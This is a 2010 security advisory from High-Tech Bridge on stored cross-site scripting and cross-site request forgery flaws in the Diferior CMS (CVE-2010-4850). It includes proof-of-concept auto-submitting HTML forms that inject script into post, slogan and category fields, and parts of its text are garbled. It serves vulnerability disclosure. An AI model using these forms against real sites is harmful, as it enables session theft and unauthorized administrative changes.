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htbridgeHigh-Tech BridgeHTB22720
HistoryNov 25, 2010 - 12:00 a.m.

Multiple Vulnerabilities in Diferior

High-Tech Bridge

0.013 Low




High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Diferior which could be exploited to perform script insertion and cross-site request forgery attacks.

  1. Script insertion vulnerability in Diferior: CVE-2010-4850
    Input passed to the β€œpost_content” parameter in views/post.php is not properly sanitized. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when user views the malicious data. Successful exploitation requires that victim is able to edit posts.
    Exploitation example:
    <form action=β€œhttp://host/post/edit/2/p1.html” method=β€œpost” enctype=β€œmultipart/form-data” name=β€œmain”>
    <input type=β€œhidden” name=β€œcategory” value=β€œsample-category-1”>
    <input type=β€œhidden” name=β€œheader” value=β€œSample post”>
    <input type=β€œhidden” name=β€œsubheader” value=β€œSample subheader”>
    <input type=β€œhidden” name=β€œpost_content” value=β€˜html<script>alert(document.cookie)</script>’>
    <input type=β€œhidden” name=β€œschedule” value=β€œnow”>
    <input type=β€œhidden” name=β€œscheduler” value=β€œ10/11/23”>
    <input type=β€œhidden” name=β€œDate_Year” value=β€œ2010”>
    <input type=β€œhidden” name=β€œDate_Month” value=β€œ11”>
    <input type=β€œhidden” name=β€œDate_Day” value=β€œ22”>
    <input type=β€œhidden” name=β€œTime_Hour” value=β€œ20”>
    <input type=β€œhidden” name=β€œTime_Minute” value=β€œ47”>
    <input type=β€œhidden” name=β€œTime_Second” value=β€œ23”>
    <input type=β€œhidden” name=β€œusehtml” value=β€œhtml”>

  2. Cross-site request forgery (CSRF) vulnerabilities in Diferior: CVE-2010-4850
    2.1 The vulnerability exists due to insufficient validation of the request origin in views/admin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change website settings (e.g. website slogan, title, timezone etc.). Due to insufficient sanitation of input data in the β€œslogan” parameter it is also possible to store and execute arbitrary HTML and script code in users browser in context of vulnerable website. Successful exploitation requires that victim is logged-in as an administrator. Exploitation example: &lt;form action="http://host/admin/site/2.html" method="post" name="main"&gt; &lt;input type="hidden" name="title" value="Site Title"&gt; &lt;input type="hidden" name="slogan" value='Powered by Diferior"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;'&gt; &lt;input type="hidden" name="timezone" value="GMT"&gt; &lt;input type="hidden" name="cron" value="php"&gt; &lt;/form&gt; &lt;script&gt; document.main.submit(); &lt;/script&gt; 2.2 The vulnerability exists due to insufficient validation of the request origin in views/admin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create categories. Due to insufficient sanitation of input data in the "subcatname" and "description" parameters it is also possible to store and execute arbitrary HTML and script code in users browser in context of vulnerable website. Successful exploitation requires that victim is logged-in as an administrator.
    Exploitation example:
    <form action=β€œhttp://host/admin/forum/create_sub.html” method=β€œpost” name=β€œmain”>
    <input type=β€œhidden” name=β€œcat” value=β€œ1”>
    <input type=β€œhidden” name=β€œsubcatname” value=β€˜subname"><script>alert(document.cookie)</script>’>
    <input type=β€œhidden” name=β€œdescription” value=β€˜description"><script>alert(document.cookie)</script>’>
    <scr ipt>
    document.main.subm it();


0.013 Low




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